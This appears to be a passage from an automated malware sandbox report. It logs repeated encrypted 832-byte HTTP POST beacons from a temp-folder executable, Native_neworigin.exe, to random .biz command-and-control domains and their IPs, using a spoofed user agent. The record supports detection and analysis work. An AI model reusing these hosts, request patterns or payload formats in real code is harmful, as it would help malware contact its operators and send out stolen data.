                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                12192.168.2.54983744.221.84.105805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.818221092 CET351OUTPOST /khahgpo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.818324089 CET832OUTData Raw: 29 06 d1 fa d5 70 84 4d 34 03 00 00 83 d8 a3 cb 67 27 bd 0c 67 4e 44 27 41 30 69 ad a4 38 c9 15 21 c3 40 63 7d c1 2e d7 d6 59 1f bd e4 18 5c 8e 38 f6 7f 38 11 c1 fc 32 1b 3d 03 32 44 35 a7 cf 10 b4 2c 38 95 57 a3 e3 4a 5f aa 85 83 87 3e 81 28 83
                                                                                                                                                                                                                                                                                                                                Data Ascii: )pM4g'gND'A0i8!@c}.Y\882=2D5,8WJ_>()Vp}8nzg5Mk_#K2'=e|VUzB;K_yNzS'Q7n2j@^3Y'nlC*3a'q1;-I[D=x:'9r>Uf:Dux?
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.288743019 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:15 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=51913fafa497fbbe5fa77d42676eb9ab|8.46.123.75|1732094715|1732094715|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                13192.168.2.549839172.234.222.138805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.744978905 CET352OUTPOST /xyttxtxgf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.745100021 CET832OUTData Raw: eb 49 fc ed af 9d 65 c8 34 03 00 00 3f 0e 2d 0b d9 27 20 e1 7f 5c 01 4a 95 50 1d 57 d1 cf d9 f0 8e bf ab 8b d1 dc f5 60 ca 57 2b b9 3d 81 90 55 af c8 c4 7b d6 77 07 38 59 13 ad 66 68 2b c7 73 89 a1 92 02 22 a1 87 b3 47 51 8d ff 53 d9 2e 8f 0a a1
                                                                                                                                                                                                                                                                                                                                Data Ascii: Ie4?-' \JPW`W+=U{w8Yfh+s"GQS.lZCG/M5Da+tD%^-o*#C^B^b5rwG9*LmXzO#S!r2Q+s


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                14192.168.2.549844172.234.222.138805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.597333908 CET347OUTPOST /fckn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.597368002 CET832OUTData Raw: 13 e8 28 5f 4c 7a fb 8b 34 03 00 00 d2 7a e9 cc 5d f2 d9 c5 06 2e 16 97 79 59 bc 61 18 a6 07 25 a5 fb e2 28 6d 04 0b 5e 13 f2 21 f9 d9 17 6f 55 47 f6 8a 69 22 97 ba a3 3a 76 a3 69 df b8 1c 73 05 16 55 68 78 3e b2 05 41 3c 3a 4f 43 e4 f4 76 85 66
                                                                                                                                                                                                                                                                                                                                Data Ascii: (_Lz4z].yYa%(m^!oUGi":visUhx>A<:OCvf^EF7qbsPqE#.[~,(e[AZ8TGA:J<c!UrJHc4.ba`0v3[e/qQI\7.M3Y^KcoVA


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                15192.168.2.54985018.141.10.107805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416853905 CET350OUTPOST /nsnnyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416897058 CET832OUTData Raw: a3 49 95 26 80 ff d0 a3 34 03 00 00 d2 7f 8c 71 4c 9d d5 a9 fb 1a c0 f8 56 98 fe 81 7c 79 9d 50 1a 88 42 08 7e 34 8d 23 79 18 67 37 48 b2 52 e6 2f 47 b3 c3 34 d3 be c4 9b 3c 2b 31 31 42 12 68 01 e9 e5 23 7b 31 c3 66 53 3a ed da 7a c9 8e eb 50 24
                                                                                                                                                                                                                                                                                                                                Data Ascii: I&4qLV|yPB~4#yg7HR/G4<+11Bh#{1fS:zP$@zy= zm<j(Vw")|n@#|B96?We[35USUNT'krtdr$wUA&pomGn=70H6FX$H2Fl
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:18.825320005 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:18 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=8e6f60a39ef17bb7ea1bbdf053155fca|8.46.123.75|1732094718|1732094718|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                16192.168.2.54987254.244.188.177802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.297322035 CET358OUTPOST /cakchsrrlpkav HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.297322035 CET832OUTData Raw: 9b 2c 7b fa e5 dd fc fd 34 03 00 00 22 ce d5 49 d1 bb d3 1c 1c e0 5f dc 61 71 af c3 a5 d1 a8 98 bf a8 35 93 75 c5 6c 5b 26 6e a9 38 ad 57 42 95 dd 21 8d 3a e8 48 d6 62 81 64 16 35 0d ed 53 4f e2 bf 34 97 0f 97 33 ab f1 6c 06 bd 91 3e 4a bd 96 46
                                                                                                                                                                                                                                                                                                                                Data Ascii: ,{4"I_aq5ul[&n8WB!:Hbd5SO43l>JFXE =vhV)dBPg0J<U//EE85.':;L_H2Bo&~gY9opj-^)f)R~ R~AxecJkcOC
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.013844967 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:21 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=84178265857989496ca9be2adb3a714b|8.46.123.75|1732094721|1732094721|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                17192.168.2.54987818.141.10.107802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.322509050 CET347OUTPOST /kfhn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.323448896 CET832OUTData Raw: f0 00 1a 20 81 b4 0c 5f 34 03 00 00 f5 ad 7d 73 81 04 51 83 4c e0 53 dc 45 20 a4 0e c8 ce 6b ef 9e ea 16 2d 5a 13 5e 21 d6 5c 81 c8 51 f7 a9 25 1c a6 e5 a9 da 18 65 98 c8 e2 53 28 38 c4 72 7b 08 3d d8 dd b7 c5 04 c5 a4 de d6 58 91 69 cc 43 77 e3
                                                                                                                                                                                                                                                                                                                                Data Ascii: _4}sQLSE k-Z^!\Q%eS(8r{=XiCwsX53mj \12~Z0sE9/5?#<scZ+%{2Xw=9?OKea$X.Gtp,!n FE##g;PZH
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:23.710129976 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e81d7120ca8c1c5fa80cfc8253030720|8.46.123.75|1732094723|1732094723|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                18192.168.2.54988854.244.188.177802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.558749914 CET343OUTPOST /rb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.558842897 CET832OUTData Raw: 54 62 06 e1 69 35 9a 3f 34 03 00 00 b1 91 c8 c3 7d e9 4d 08 c7 49 96 49 a7 c2 2f 91 f8 34 22 c3 0f 4a fc b8 0e 75 40 c4 25 5e 9b cd 5b 13 54 b3 77 57 34 f4 3d aa f3 40 2d 19 77 b2 f2 61 d9 a6 dc dd d3 4d 33 7c 79 45 c6 fd 38 07 a9 ed 0a a5 7a 26
                                                                                                                                                                                                                                                                                                                                Data Ascii: Tbi5?4}MII/4"Ju@%^[TwW4=@-waM3|yE8z&r\q(n#4X|n0$*8\qRqcCDXF!T.ZCo0@1r*Dv4EWA"gI$W\o9k+'|


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                19192.168.2.54989454.244.188.177802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.955837965 CET350OUTPOST /xkcbxhnrv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.955837965 CET832OUTData Raw: 68 86 9b bf 16 fb fc 9a 34 03 00 00 b9 84 14 6b 27 2a 7a 13 79 3e bc f6 71 95 6d eb 67 5d 14 12 52 7a 27 ee 93 a2 bb 9a a4 52 8b b5 f3 50 71 5d ef 40 67 42 1e 01 22 0a 4e a7 01 49 c4 54 b0 08 13 ad 5c 76 f2 7d e2 ef 5a f2 06 46 b8 0d f3 01 de db
                                                                                                                                                                                                                                                                                                                                Data Ascii: h4k'*zy>qmg]Rz'RPq]@gB"NIT\v}ZF^&!u'.#NVURz_v!"i`{O;Rh@MH[%/YQ9j:Z08:=BTtb6e8rZ@-|bM!#K
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.667771101 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=d4b7aba01b2a4d8d22717f2693dba38c|8.46.123.75|1732094725|1732094725|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                20192.168.2.54990144.221.84.105802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.848561049 CET358OUTPOST /dkglfbueemimxh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.848697901 CET832OUTData Raw: 28 98 c1 47 61 02 83 46 34 03 00 00 b8 56 75 1e 7f 19 37 d2 07 73 c1 53 40 2c 17 83 7d 33 63 b0 b0 a6 92 05 88 68 3b 34 d7 45 69 ef a6 fc cf f0 a5 1e 3e db d6 18 e2 ca 8a 14 be 0e 16 83 4f 73 fd d9 73 08 92 df 03 78 dd 0f 54 d0 c9 34 75 78 1c e9
                                                                                                                                                                                                                                                                                                                                Data Ascii: (GaF4Vu7sS@,}3ch;4Ei>OssxT4uxJQT|A2EWQ&0|z1Tc "Q0,;Tv6kj$3|&OxOfPW;&2HuWWidfM'frwW$$:xmhvJ6Fo&y{
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332681894 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=4ce1adf9b7e35a785528e9b901b01757|8.46.123.75|1732094726|1732094726|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                21192.168.2.549907172.234.222.138802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET352OUTPOST /krmiyakxt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET832OUTData Raw: b9 11 32 44 dc 19 06 45 34 03 00 00 39 40 84 85 ce 78 58 7c d6 19 04 70 e6 b9 7a 52 24 49 db af e1 80 e1 6c e7 4e 54 cb 43 13 49 dc 2d 02 91 7b 3d 30 e6 0c 29 0c f7 55 50 e9 88 7f 44 3f 19 af fd f0 e9 a6 1a e9 1b 37 41 03 a8 3f 5e 79 09 97 27 83
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2DE49@xX|pzR$IlNTCI-{=0)UPD?7A?^y'Q\ K[6#8S297"6j;HID{lt=;P\lU"RRp0$YT_:^dmI?0:TPtRq&Z-


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                22192.168.2.549912172.234.222.138802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET349OUTPOST /cbhxke HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET832OUTData Raw: e5 f9 65 57 4f b0 a2 bf 34 03 00 00 70 ed 87 0c ad ba 81 85 b3 68 32 16 4a 4e 90 bd da 3a d6 47 51 ad 43 f0 68 74 46 4b bf 7d 5e 83 b1 f8 77 28 a4 4a a8 e0 50 08 66 74 8d 70 49 7f 16 05 94 fa 05 98 90 a2 40 5e b8 46 00 e8 98 a5 58 32 82 24 c7 51
                                                                                                                                                                                                                                                                                                                                Data Ascii: eWO4ph2JN:GQChtFK}^w(JPftpI@^FX2$QqW#J>AIUx@_!l9L$VSf%"V~\#tWFE[ X2l!OO>7}1M!W!^[[^o'oewTmeVw&a


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                23192.168.2.54991418.141.10.107802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET348OUTPOST /mwpi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET832OUTData Raw: 77 8a d8 8a 11 5a d1 a6 34 03 00 00 a1 67 5b 69 54 42 3d c2 c1 37 dc 30 fb 15 f3 9b d4 c1 ca 89 89 7e 39 18 9a ec 45 3e 9c 80 b5 95 69 93 71 0b fa 36 22 56 9a 72 db 98 27 bc cd 5d 3e ea f9 db 94 17 58 48 c4 e5 d2 c6 30 51 52 08 56 16 60 35 f4 c8
                                                                                                                                                                                                                                                                                                                                Data Ascii: wZ4g[iTB=70~9E>iq6"Vr']>XH0QRV`5L@.9f+W%wvneCGGT%(H:w`^h~-Uo>.D~i4/AeF!SBx'`\7E@@ OR6P\.e|2
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.359961987 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=7eb9827cd271f407156a1499507ec62e|8.46.123.75|1732094729|1732094729|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                24192.168.2.54992582.112.184.197802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.709470987 CET348OUTPOST /pfrxci HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
